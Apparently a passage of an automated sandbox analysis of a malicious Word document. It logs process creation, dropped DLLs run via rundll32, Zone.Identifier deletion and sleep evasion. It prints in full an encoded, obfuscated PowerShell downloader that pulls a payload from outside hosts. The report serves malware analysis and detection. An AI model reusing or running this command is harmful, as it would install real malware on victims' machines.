FoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100037FB push ecx; ret	7_2_1000380E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004134 push ecx; ret	7_2_10004146
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100037FB push ecx; ret	8_2_1000380E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004134 push ecx; ret	8_2_10004146

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bsmdm\ghwk.vcj:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Anheubolw\yblyupae.she:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vvkklg\owmtf.xpy:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qjhyis\vvyps.icm:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
